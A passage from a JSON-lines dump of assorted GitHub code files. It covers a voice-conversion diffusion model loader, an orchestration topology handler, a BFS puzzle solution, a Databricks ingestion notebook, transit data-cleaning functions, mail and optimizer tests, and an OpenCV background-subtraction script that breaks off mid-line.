+{"seq_id":"5596867320","text":"import os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport yaml\n\nfrom .diffusion import GaussianDiffusion\nfrom .vocoder import Vocoder\nfrom .wavenet import WaveNet\n\n\nclass DotDict(dict):\n def __getattr__(*args): \n val = dict.get(*args) \n return DotDict(val) if type(val) is dict else val \n\n __setattr__ = dict.__setitem__ \n __delattr__ = dict.__delitem__\n\n \ndef load_model_vocoder(\n model_path,\n device='cpu',\n config_path = None\n ):\n if config_path is None:\n config_file = os.path.join(os.path.split(model_path)[0], 'config.yaml')\n else:\n config_file = config_path\n\n with open(config_file, \"r\") as config:\n args = yaml.safe_load(config)\n args = DotDict(args)\n \n # load vocoder\n vocoder = Vocoder(args.vocoder.type, args.vocoder.ckpt, device=device)\n \n # load model\n model = Unit2Mel(\n args.data.encoder_out_channels, \n args.model.n_spk,\n args.model.use_pitch_aug,\n vocoder.dimension,\n args.model.n_layers,\n args.model.n_chans,\n args.model.n_hidden,\n args.model.timesteps,\n args.model.k_step_max\n )\n \n print(' [Loading] ' + model_path)\n ckpt = torch.load(model_path, map_location=torch.device(device))\n model.to(device)\n model.load_state_dict(ckpt['model'])\n model.eval()\n print(f'Loaded diffusion model, sampler is {args.infer.method}, speedup: {args.infer.speedup} ')\n return model, vocoder, args\n\n\nclass Unit2Mel(nn.Module):\n def __init__(\n self,\n input_channel,\n n_spk,\n use_pitch_aug=False,\n out_dims=128,\n n_layers=20, \n n_chans=384, \n n_hidden=256,\n timesteps=1000,\n k_step_max=1000\n ):\n super().__init__()\n self.unit_embed = nn.Linear(input_channel, n_hidden)\n self.f0_embed = nn.Linear(1, n_hidden)\n self.volume_embed = nn.Linear(1, n_hidden)\n if use_pitch_aug:\n self.aug_shift_embed = nn.Linear(1, n_hidden, bias=False)\n else:\n self.aug_shift_embed = None\n self.n_spk = n_spk\n if n_spk is not None and n_spk > 1:\n self.spk_embed = nn.Embedding(n_spk, n_hidden)\n \n self.timesteps = timesteps if timesteps is not None else 1000\n self.k_step_max = k_step_max if k_step_max is not None and k_step_max>0 and k_step_max 1:\n if spk_mix_dict is not None:\n spk_embed_mix = torch.zeros((1,1,self.hidden_size))\n for k, v in spk_mix_dict.items():\n spk_id_torch = torch.LongTensor(np.array([[k]])).to(units.device)\n spk_embeddd = self.spk_embed(spk_id_torch)\n self.speaker_map[k] = spk_embeddd\n spk_embed_mix = spk_embed_mix + v * spk_embeddd\n x = x + spk_embed_mix\n else:\n x = x + self.spk_embed(spk_id - 1)\n self.speaker_map = self.speaker_map.unsqueeze(0)\n self.speaker_map = self.speaker_map.detach()\n return x.transpose(1, 2)\n\n def init_spkmix(self, n_spk):\n self.speaker_map = torch.zeros((n_spk,1,1,self.n_hidden))\n hubert_hidden_size = self.input_channel\n n_frames = 10\n hubert = torch.randn((1, n_frames, hubert_hidden_size))\n f0 = torch.randn((1, n_frames))\n volume = torch.randn((1, n_frames))\n spks = {}\n for i in range(n_spk):\n spks.update({i:1.0/float(self.n_spk)})\n self.init_spkembed(hubert, f0.unsqueeze(-1), volume.unsqueeze(-1), spk_mix_dict=spks)\n\n def forward(self, units, f0, volume, spk_id = None, spk_mix_dict = None, aug_shift = None,\n gt_spec=None, infer=True, infer_speedup=10, method='dpm-solver', k_step=300, use_tqdm=True):\n \n '''\n input: \n B x n_frames x n_unit\n return: \n dict of B x n_frames x feat\n '''\n\n if not self.training and gt_spec is not None and k_step>self.k_step_max:\n raise Exception(\"The shallow diffusion k_step is greater than the maximum diffusion k_step(k_step_max)!\")\n\n if not self.training and gt_spec is None and self.k_step_max!=self.timesteps:\n raise Exception(\"This model can only be used for shallow diffusion and can not infer alone!\")\n\n x = self.unit_embed(units) + self.f0_embed((1+ f0 / 700).log()) + self.volume_embed(volume)\n if self.n_spk is not None and self.n_spk > 1:\n if spk_mix_dict is not None:\n for k, v in spk_mix_dict.items():\n spk_id_torch = torch.LongTensor(np.array([[k]])).to(units.device)\n x = x + v * self.spk_embed(spk_id_torch)\n else:\n if spk_id.shape[1] > 1:\n g = spk_id.reshape((spk_id.shape[0], spk_id.shape[1], 1, 1, 1)) # [N, S, B, 1, 1]\n g = g * self.speaker_map # [N, S, B, 1, H]\n g = torch.sum(g, dim=1) # [N, 1, B, 1, H]\n g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N]\n x = x + g\n else:\n x = x + self.spk_embed(spk_id)\n if self.aug_shift_embed is not None and aug_shift is not None:\n x = x + self.aug_shift_embed(aug_shift / 5) \n x = self.decoder(x, gt_spec=gt_spec, infer=infer, infer_speedup=infer_speedup, method=method, k_step=k_step, use_tqdm=use_tqdm)\n \n return x\n\n","repo_name":"svc-develop-team/so-vits-svc","sub_path":"diffusion/unit2mel.py","file_name":"unit2mel.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":20915,"dataset":"github-code","pt":"84"} +{"seq_id":"40727328505","text":"from ...parser.validation import issue\nfrom ...modeling import models\nfrom ...utils import console\nfrom . import (\n template_handler,\n instance_handler,\n common\n)\n\n\nclass Topology(issue.ReporterMixin):\n\n _init_map = {\n models.ServiceTemplate: models.Service,\n models.ArtifactTemplate: models.Artifact,\n models.CapabilityTemplate: models.Capability,\n models.GroupTemplate: models.Group,\n models.InterfaceTemplate: models.Interface,\n models.NodeTemplate: models.Node,\n models.PolicyTemplate: models.Policy,\n models.SubstitutionTemplate: models.Substitution,\n models.RelationshipTemplate: models.Relationship,\n models.OperationTemplate: models.Operation,\n models.SubstitutionTemplateMapping: models.SubstitutionMapping,\n\n # Common\n models.Metadata: models.Metadata,\n models.Attribute: models.Attribute,\n models.Property: models.Property,\n models.Input: models.Input,\n models.Output: models.Output,\n models.Configuration: models.Configuration,\n models.Argument: models.Argument,\n models.Type: models.Type\n }\n\n def __init__(self, *args, **kwargs):\n super(Topology, self).__init__(*args, **kwargs)\n self._model_cls_to_handler = dict(self._init_handlers(instance_handler),\n **self._init_handlers(template_handler))\n\n @staticmethod\n def _init_handlers(module_):\n \"\"\"\n Register handlers from a handler module to the models.\n\n :param module_: the module to look for handlers\n :returns: dict where the key is the models class, and the value is the handler class\n associated with it from the provided module\n \"\"\"\n handlers = {}\n for attribute_name in dir(module_):\n if attribute_name.startswith('_'):\n continue\n attribute = getattr(module_, attribute_name)\n if isinstance(attribute, type) and issubclass(attribute, common.HandlerBase):\n handlers[getattr(models, attribute_name)] = attribute\n return handlers\n\n def instantiate(self, model, **kwargs):\n \"\"\"\n Instantiate the provided model.\n\n :param model:\n :param kwargs:\n :returns:\n \"\"\"\n if isinstance(model, dict):\n return dict((name, self.instantiate(value, **kwargs))\n for name, value in model.iteritems())\n elif isinstance(model, list):\n return list(self.instantiate(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n model_instance_cls = self._init_map[model.__class__]\n return _handler(self, model).instantiate(model_instance_cls, **kwargs)\n\n def validate(self, model, **kwargs):\n if isinstance(model, dict):\n return self.validate(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.validate(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).validate(**kwargs)\n\n def dump(self, model, out_stream=None, title=None, **kwargs):\n out_stream = out_stream or console.TopologyStylizer()\n\n # if model is empty, no need to print out the section name\n if model and title:\n out_stream.write('{0}:'.format(title))\n\n if isinstance(model, dict):\n if str(out_stream):\n with out_stream.indent():\n return self.dump(model.values(), out_stream=out_stream, **kwargs)\n else:\n return self.dump(model.values(), out_stream=out_stream, **kwargs)\n\n elif isinstance(model, list):\n for value in model:\n self.dump(value, out_stream=out_stream, **kwargs)\n\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n _handler(self, model).dump(out_stream=out_stream, **kwargs)\n\n return out_stream\n\n def dump_graph(self, service):\n out_stream = console.TopologyStylizer()\n for node in service.nodes.itervalues():\n if not node.inbound_relationships:\n self._dump_graph_node(out_stream, node)\n return out_stream\n\n def _dump_graph_node(self, out_stream, node, capability=None):\n out_stream.write(out_stream.node_style(node.name))\n if capability is not None:\n out_stream.write('{0} ({1})'.format(out_stream.property_style(capability.name),\n out_stream.type_style(capability.type.name)))\n if node.outbound_relationships:\n with out_stream.indent():\n for relationship_model in node.outbound_relationships:\n styled_relationship_name = out_stream.property_style(relationship_model.name)\n if relationship_model.type is not None:\n out_stream.write('-> {0} ({1})'.format(\n styled_relationship_name,\n out_stream.type_style(relationship_model.type.name)))\n else:\n out_stream.write('-> {0}'.format(styled_relationship_name))\n with out_stream.indent(3):\n self._dump_graph_node(out_stream,\n relationship_model.target_node,\n relationship_model.target_capability)\n\n def coerce(self, model, **kwargs):\n if isinstance(model, dict):\n return self.coerce(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.coerce(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).coerce(**kwargs)\n\n def dump_types(self, service_template, out_stream=None):\n out_stream = out_stream or console.TopologyStylizer()\n self.dump(service_template.node_types, out_stream, 'Node types')\n self.dump(service_template.group_types, out_stream, 'Group types')\n self.dump(service_template.capability_types, out_stream, 'Capability types')\n self.dump(service_template.relationship_types, out_stream, 'Relationship types')\n self.dump(service_template.policy_types, out_stream, 'Policy types')\n self.dump(service_template.artifact_types, out_stream, 'Artifact types')\n self.dump(service_template.interface_types, out_stream, 'Interface types')\n\n return out_stream\n\n def satisfy_requirements(self, model, **kwargs):\n if isinstance(model, dict):\n return self.satisfy_requirements(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.satisfy_requirements(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).satisfy_requirements(**kwargs)\n\n def validate_capabilities(self, model, **kwargs):\n if isinstance(model, dict):\n return self.validate_capabilities(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.validate_capabilities(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).validate_capabilities(**kwargs)\n\n def _find_host(self, node):\n if node.type.role == 'host':\n return node\n\n def target_has_role(rel, role):\n return (rel.target_capability is not None and\n rel.target_capability.type.role == role)\n\n for outbound_relationship in node.outbound_relationships:\n if target_has_role(outbound_relationship, 'host'):\n host = self._find_host(outbound_relationship.target_node)\n if host is not None:\n return host\n for inbound_relationship in node.inbound_relationships:\n if target_has_role(inbound_relationship, 'feature'):\n host = self._find_host(inbound_relationship.source_node)\n if host is not None:\n return host\n return None\n\n def assign_hosts(self, service):\n for node in service.nodes.values():\n node.host = self._find_host(node)\n\n def configure_operations(self, model, **kwargs):\n if isinstance(model, dict):\n return self.configure_operations(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.configure_operations(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).configure_operations(**kwargs)\n","repo_name":"onap/archive-multicloud-azure","sub_path":"azure/aria/aria-extension-cloudify/src/aria/aria/orchestrator/topology/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":9084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"74429137873","text":"# https://www.acmicpc.net/problem/21736\nimport sys\nfrom collections import deque\nsys.stdin = open('input.txt','r')\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nmatrix = []\nvisited = [[False]*M for _ in range(N)]\nanswer, x, y = 0, 0, 0\nfor r in range(N):\n arr = list(input().rstrip())\n if 'I' in arr:\n x, y = r, arr.index('I')\n matrix.append(arr)\n\nqueue = deque([(x,y)])\nvisited[x][y] = True\nwhile queue:\n r, c = queue.popleft()\n for dx, dy in ((1,0),(0,1),(-1,0),(0,-1)):\n nx, ny = r+dx, c+dy\n if 0 <= nx < N and 0 <= ny < M and\\\n not visited[nx][ny] and matrix[nx][ny] != 'X':\n visited[nx][ny] = True\n if matrix[nx][ny] == 'P': answer += 1\n queue.append((nx,ny))\nprint(answer or 'TT')","repo_name":"yj95228/practice-coding-test","sub_path":"python/baekjoon/[21736] 헌내기는 친구가 필요해.py","file_name":"[21736] 헌내기는 친구가 필요해.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"10967406668","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Ingest pit_stops.json file\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\",\"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\",\"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/common_functions\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import current_timestamp, col, concat, lit\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType, DateType, FloatType, TimestampType\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### step 1 - Reading the JSON file using dataframe reader\n\n# COMMAND ----------\n\npit_stops_schema = StructType(fields=[\n StructField(\"raceId\", IntegerType(),False),\n StructField(\"driverId\", IntegerType(),True),\n StructField(\"stop\", StringType(),True),\n StructField(\"lap\", IntegerType(),True),\n StructField(\"time\", StringType(),True),\n StructField(\"duration\", StringType(),True),\n StructField(\"milliseconds\", IntegerType(),True),\n])\n\n# COMMAND ----------\n\npit_stops_df = spark.read.schema(pit_stops_schema) \\\n.option(\"multiline\", True) \\\n.json(f\"{raw_folder_path}{v_file_date}/pit_stops.json\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### step 2 - Renaming columns and adding new ones\n\n# COMMAND ----------\n\npit_stops_final_df = pit_stops_df \\\n.withColumnRenamed(\"raceId\",\"race_id\") \\\n.withColumnRenamed(\"driverId\",\"driver_id\") \\\n.withColumn(\"data_source\", lit(v_data_source)) \\\n.withColumn(\"file_date\", lit(v_file_date)) \\\n.withColumn(\"ingestion_date\", current_timestamp())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ~~step 3 - write the data to parquet~~\n\n# COMMAND ----------\n\n# pit_stops_final_df.write.mode(\"overwrite\").parquet(f\"{processed_folder_path}pit_stops\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### step 3 - Writing data to f1_proccesed database as parquet\n\n# COMMAND ----------\n\n# overwrite_partition(pit_stops_final_df,'f1_processed','pit_stops','race_id')\nmerge_condition = \"tgt.driver_id = src.driver_id AND tgt.race_id = src.race_id AND tgt.stop = src.stop\"\nmerge_delta_data(pit_stops_final_df,'f1_processed','pit_stops', processed_folder_path, merge_condition, 'race_id')\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"Done 😎\")\n","repo_name":"Marcynas/DataBricksFormula1","sub_path":"F1project/ingestion/6.ingest_pit_stops_file.py","file_name":"6.ingest_pit_stops_file.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"34308237924","text":"import numpy as np\nfrom vizier import algorithms as vza\nfrom vizier import benchmarks\nfrom vizier import pyvizier as vz\nfrom vizier._src.algorithms.designers import random\nfrom vizier._src.algorithms.testing import convergence_runner\nfrom vizier._src.algorithms.testing import test_runners\nfrom vizier._src.benchmarks.experimenters import shifting_experimenter\nfrom vizier._src.benchmarks.experimenters.synthetic import bbob\nfrom vizier.testing import test_studies\n\nfrom absl.testing import absltest\n\n\nclass RandomTest(absltest.TestCase):\n\n def test_on_flat_space(self):\n config = vz.ProblemStatement(test_studies.flat_space_with_all_types())\n designer = random.RandomDesigner(config.search_space, seed=None)\n self.assertLen(\n test_runners.run_with_random_metrics(\n designer, config, iters=50, batch_size=1), 50)\n\n def test_reproducible_random(self):\n config = vz.ProblemStatement(test_studies.flat_space_with_all_types())\n designer = random.RandomDesigner(config.search_space, seed=5)\n t1 = designer.suggest(10)\n\n designer = random.RandomDesigner(config.search_space, seed=5)\n t2 = designer.suggest(10)\n self.assertEqual(t1, t2)\n\n def test_convergence_1d(self):\n problem = bbob.DefaultBBOBProblemStatement(1)\n experimenter = shifting_experimenter.ShiftingExperimenter(\n exptr=benchmarks.NumpyExperimenter(bbob.Sphere, problem),\n shift=np.random.random())\n\n def _random_designer_factory(problem: vz.ProblemStatement) -> vza.Designer:\n return random.RandomDesigner(problem.search_space)\n\n benchmark_state_factory = benchmarks.DesignerBenchmarkStateFactory(\n designer_factory=_random_designer_factory,\n experimenter=experimenter,\n )\n convergence_test = convergence_runner.BenchmarkConvergenceRunner(\n benchmark_state_factory=benchmark_state_factory,\n trials_per_check=5000,\n repeated_checks=5,\n success_rate_threshold=0.6,\n tolerance=1.0)\n convergence_test.assert_converges()\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"ranggakd/vizier","sub_path":"vizier/_src/algorithms/designers/random_test.py","file_name":"random_test.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"38432112990","text":"import pandas as pd\nfrom collections import defaultdict\n\n\"\"\"\nDATA PREPARATION FUNCTIONS\n\"\"\"\n\n\ndef get_uid_to_curbreadcrumbs_tsprequest(tripdatas_df):\n uid_to_curbreadcrumbs = tripdatas_df[tripdatas_df[\"event\"] == \"TSP request\"]\n uid_to_curbreadcrumbs = (\n uid_to_curbreadcrumbs.groupby(\"uid\")[\"event\"].count().reset_index()\n )\n\n return uid_to_curbreadcrumbs\n\n\ndef prepare_triplogs(triplogs_df):\n \"\"\"\n transform data format to comfortable and add extra columns to triplogs\n \"\"\"\n triplogs_df[\"starttime\"] = pd.to_datetime(triplogs_df[\"starttime\"])\n triplogs_df[\"endtime\"] = pd.to_datetime(triplogs_df[\"endtime\"])\n triplogs_df[\"starthour\"] = triplogs_df[\"starttime\"].dt.hour\n # uid (unique id) is used to uniquely identify record and do mapping between triplogs and tripdatas dataset\n triplogs_df[\"uid\"] = triplogs_df[\"deviceid\"] + \"_\" + triplogs_df[\"logid\"]\n return triplogs_df\n\n\ndef prepare_tripdatas(tripdatas_df):\n \"\"\"\n transform data format to comfortable and add extra columns to tripdatas\n \"\"\"\n # uid (unique id) is used to uniquely identify record and do mapping between triplogs and tripdatas dataset\n tripdatas_df[\"uid\"] = tripdatas_df[\"deviceid\"] + \"_\" + tripdatas_df[\"logid\"]\n tripdatas_df[\"time\"] = pd.to_datetime(tripdatas_df[\"time\"])\n\n return tripdatas_df\n\n\n\"\"\"\nDATA CLEANING FUNCTIONS\n\"\"\"\n\n\"\"\"\nTESTS is rows good for study in triplogs\nEvery test takes row from triplogs as input and returns True or False\n\"\"\"\n\n\ndef df_valid_test(df):\n \"\"\"\n row: row from triplogs\n returns: bool\n valid is a field given in default triplogs dataset. After inspection we understand that:\n if row in triplogs is not valid,\n it has at least one of the following properties:\n 1) endstatus == “not started” or endstatus == “aborted”\n 2) duration < 0\n \"\"\"\n return df.valid == True\n\n\ndef end_after_start_test(df):\n return df[\"starttime\"] < df[\"endtime\"]\n\n\ndef endstatus_completed_test(df):\n \"\"\"\n endstatus can be aborted, completed, not started\n some aborted trips still can be useful becuase it cold be aborted close to the end of the trip\n \"\"\"\n return df[\"endstatus\"] == \"completed\"\n\n\ndef tspmode_not_normal_test(df):\n \"\"\"\n tspmode can be always on, always off, normal\n normal can still be useful when inspecting segments\n \"\"\"\n return df[\"tspmode\"] != \"normal\"\n\n\ndef negative_duration_test(df):\n return df[\"duration\"] > 0\n\n\ndef has_enough_breadcrumbs_test(triplogs, tripdatas_count_by_uid):\n \"\"\"\n return True if in tripdatas there are more rows corresponding to uid in given triplogs_row than\n duration of trip (in seconds) * 0.7. Because ideally we have a row in tripdatas for every second of trip in\n triplogs, but we consider 70% to be enough. Otherwise trip is considered not good for study\n \"\"\"\n\n # count number of events because event should occur every second (GPS in particular)\n event_count = triplogs.merge(tripdatas_count_by_uid, on=\"uid\", how=\"left\")[\"event\"]\n return event_count > triplogs[\"duration\"] * 0.7\n\n\ndef hit_enough_stops_test(triplogs):\n \"\"\"\n if bus has hit more than 70% of stops it was expected to, the trip is considered good\n \"\"\"\n return triplogs[\"countstopshit\"] / triplogs[\"stops\"] > 0.7\n\n\ndef three_sigmas_cutoff(triplogs, triplogs_grouped):\n \"\"\"\n in one group (routename + direction) duration of trip are expected to be close t oeach other\n we use statistics (3 standard deviations cutoff) to remove trips with very low or high duration\n compared to others in the group\n triplogs_grouped = {\n (tripname, direction) as index: [trip durations std]\n }\n return True if (mean-3*std < triplenth < mean+3*std) else False\n \"\"\"\n\n means = triplogs.merge(\n triplogs_grouped.mean().reset_index(), on=[\"routename\", \"direction\"], how=\"left\"\n )[\"duration_y\"]\n stds = triplogs.merge(\n triplogs_grouped.std(ddof=0).reset_index(),\n on=[\"routename\", \"direction\"],\n how=\"left\",\n )[\"duration_y\"]\n return ((means - 3 * stds) < triplogs[\"duration\"]) & (\n triplogs[\"duration\"] < (means + 3 * stds)\n )\n\n\ndef tsprequest_occur_for_tspon_test(df, uid_to_curbreadcrumbs_tsprequest):\n \"\"\"\n if tspmode always on, we want ot make sure\n that intersections with tsp were present on the route\n so we check if tsp requests occured on the route\n \"\"\"\n is_tsp_req_done = (\n df.merge(uid_to_curbreadcrumbs_tsprequest, on=\"uid\", how=\"left\")[\"event\"] > 0\n )\n return (df[\"tspmode\"] == \"alwaysOff\") | is_tsp_req_done\n\n\n\"\"\"\nMAIN FILTRATION FUNCTION\n\"\"\"\n\n\ndef get_clean_triplogs(\n triplogs_df, tripdatas_df, filtration_dict=defaultdict(lambda: True)\n):\n \"\"\"\n cleans triplogs from data considered abnormal\n\n filtration_dict: dict with keys corresponding to tests by which filtration is applied and values True (if apply) or False\n\n Available keys in filtration_dict: \"row_valid_test\", \"end_after_start_test\", \"endstatus_completed_test\",\n \"tspmode_not_normal_test\", \"negative_duration_test\", \"hit_enough_stops_test\", \"has_enough_breadcrumbs_test\",\n \"remove_duplicates\", \"3_stds\"\n\n By default all filtrations are applied\n\n If you want not to apply some filtration, pass False as value for some key in defaultdict.\n For example:\n my_filtration_dict = defaultdict(lambda: True)\n my_filtration_dict['row_valid_test'] = False\n \"\"\"\n\n triplogs_clean = triplogs_df\n triplogs_clean[\"is_good_for_study\"] = True\n\n # msg is added to reason_not_good_for_study in row where corresponding test failed.\n # Every msg is separated with a coma (,)\n\n if filtration_dict[\"row_valid_test\"]:\n # drop invalid\n print(\"drop invalid\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & df_valid_test(triplogs_clean)\n\n if filtration_dict[\"end_after_start_test\"]:\n # drop starttime >= endtime\n print(\"drop starttime >= endtime\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & end_after_start_test(triplogs_clean)\n\n if filtration_dict[\"endstatus_completed_test\"]:\n # drop endstatus not completed\n print(\"drop endstatus not completed\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & endstatus_completed_test(triplogs_clean)\n\n if filtration_dict[\"tspmode_not_normal_test\"]:\n # drop normal tspmode\n print(\"drop normal tspmode\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & tspmode_not_normal_test(triplogs_clean)\n\n if filtration_dict[\"negative_duration_test\"]:\n # drop negative duration\n print(\"drop negative duration\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & negative_duration_test(triplogs_clean)\n\n if filtration_dict[\"hit_enough_stops_test\"]:\n # drop <=70% stops hit\n print(\"drop <=70% stops hit\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & hit_enough_stops_test(triplogs_clean)\n\n if filtration_dict[\"has_enough_breadcrumbs_test\"]:\n # drop <=70% breadcrumbs\n print(\"drop <=70% breadcrumbs\")\n tripdatas_count_by_uid = (\n tripdatas_df[tripdatas_df[\"event\"] == \"GPS\"]\n .groupby(\"uid\")[\"event\"]\n .count()\n .reset_index()\n )\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & has_enough_breadcrumbs_test(triplogs_clean, tripdatas_count_by_uid)\n\n if filtration_dict[\"remove_duplicates\"]:\n # drop duplicated rows\n print(\"drop duplicated rows\")\n cols_for_detecting_duplicaltes = list(\n set(triplogs_clean.columns) - set([\"_id\", \"uploaddate\"])\n )\n is_duplicated_row = triplogs_clean.duplicated(\n subset=cols_for_detecting_duplicaltes, keep=\"first\"\n )\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\"is_good_for_study\"] & (\n ~is_duplicated_row\n )\n\n # if after all checks we still have empty string in reason_not_good_for_study, row is good for study\n # triplogs_clean['is_good_for_study'] = triplogs_clean[\"reason_not_good_for_study\"] == \"\"\n\n if filtration_dict[\"remove_tspon_no_tsprequests\"]:\n # drop tspon no tsp requests\n print(\"drop tspon no tsp requests\")\n # msg = \", tspon but no tsp requests\"\n uid_to_curbreadcrumbs_tsprequest = get_uid_to_curbreadcrumbs_tsprequest(\n tripdatas_df\n )\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & tsprequest_occur_for_tspon_test(\n triplogs_clean, uid_to_curbreadcrumbs_tsprequest\n )\n\n if filtration_dict[\"3_stds\"]:\n # drop trips with 3*stds lower and higher of a middle trip time\n print(\"drop 3 stds anomalies\")\n groupby = [\"routename\", \"direction\"]\n triplogs_grouped = triplogs_clean[triplogs_clean[\"is_good_for_study\"]].groupby(\n groupby\n )[\"duration\"]\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & three_sigmas_cutoff(triplogs_clean, triplogs_grouped)\n\n return triplogs_clean\n\n\ndef get_clean_tripdatas(tripdatas_df, filtration_dict=defaultdict(lambda: True)):\n tripdatas_clean = tripdatas_df\n if filtration_dict[\"remove_duplicates\"]:\n # drop duplicated rows\n cols_for_detecting_duplicaltes = list(\n set(tripdatas_clean.columns) - set([\"_id\"])\n )\n is_duplicated_row = tripdatas_clean.duplicated(\n subset=cols_for_detecting_duplicaltes, keep=\"first\"\n )\n tripdatas_clean[\"is_good_for_study\"] = ~is_duplicated_row\n\n return tripdatas_clean\n\n\ndef get_and_clean_tripdatas_triplogs_merge(\n tripdatas_clean, triplogs_clean, filtration_dict=defaultdict(lambda: True)\n):\n merged_df = tripdatas_clean.merge(triplogs_clean, how=\"inner\", on=\"uid\")\n if filtration_dict[\"remove_routes_mismatch\"]:\n # drop trips which do not match on routes\n print(\"drop trips which do not match on routes\")\n is_mismatch = merged_df[\"routename_y\"] != merged_df[\"routename_x\"]\n merged_df[\"is_good_for_study\"] = ~is_mismatch\n return merged_df\n","repo_name":"morchf/new_cdf_testing","sub_path":"ClientAPI/DS/data_cleaning/data_preparation_faster.py","file_name":"data_preparation_faster.py","file_ext":"py","file_size_in_byte":10512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"27759610620","text":"mailbox.check_empty()\n\nwith frontend.signin(\"alice\"):\n to_alice = testing.mailbox.ToRecipient(\"alice@example.org\")\n to_bob = testing.mailbox.ToRecipient(\"bob@example.org\")\n\n frontend.operation(\n \"MailTransaction\",\n data={ \"mails\": [{ \"to\": [\"alice\", \"bob\"],\n \"subject\": \"MailTransaction test #1\",\n \"body\": \"This is the mail body.\\n\\nBye, bye.\" }] },\n expect={ \"message\": None })\n\n def recipients_equal(expected, actual):\n return set(expected) == set(map(str.strip, actual.split(\",\")))\n\n def check_mail1(mail):\n testing.expect.check(\"Alice von Testing \",\n mail.header(\"From\"))\n testing.expect.check([\"Alice von Testing \",\n \"Bob von Testing \"],\n mail.header(\"To\"), equal=recipients_equal)\n testing.expect.check(\"MailTransaction test #1\",\n mail.header(\"Subject\"))\n testing.expect.check([\"This is the mail body.\", \"\", \"Bye, bye.\"],\n mail.lines)\n\n check_mail1(mailbox.pop(to_alice))\n check_mail1(mailbox.pop(to_bob))\n","repo_name":"jensl/critic","sub_path":"testing/tests/001-main/004-extensions/002-tests/004-TestExtension/005-MailTransaction.py","file_name":"005-MailTransaction.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":384,"dataset":"github-code","pt":"84"} +{"seq_id":"4942839471","text":"'''\nAUTHOR: ceposerio@up.edu.ph\nDESC: a demo of background subtraction with a series of images as input\n'''\n\nimport numpy as np \nimport cv2\n\n# the higher, the better (?)\n__NUM_LEARN_FRAMES__ = 200\n__FOREGROUND_DIFF_THRESH__ = 25\n\ncap = cv2.VideoCapture(0)\n\n# gets __NUM_LEARN_FRAMES__, and its median to compute for the background.\nprint(\"Learning the background frames. Please wait...\")\nbackground_frames = []\nwhile len(background_frames) < __NUM_LEARN_FRAMES__:\n\tret, frame = cap.read()\n\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tbackground_frames.append(frame)\n\nbackground_frames = np.array(background_frames)\nbackground = np.median(background_frames, axis = 0)\n\nbackgroundShow = background.clip(0,255).astype('uint8')\nprint(\"Done!\")\ncv2.imshow(\"background\", backgroundShow)\n\n# loop until 'q' is pressed.\nwhile(1):\n\tret, current_frame = cap.read()\n\tcurrent_gray_frame = cv2.cvtColor(current_frame, cv2.COLOR_BGR2GRAY)\n\n\tdiff = current_gray_frame - background\n\tdiff = np.absolute(diff)\n\tmask = diff > 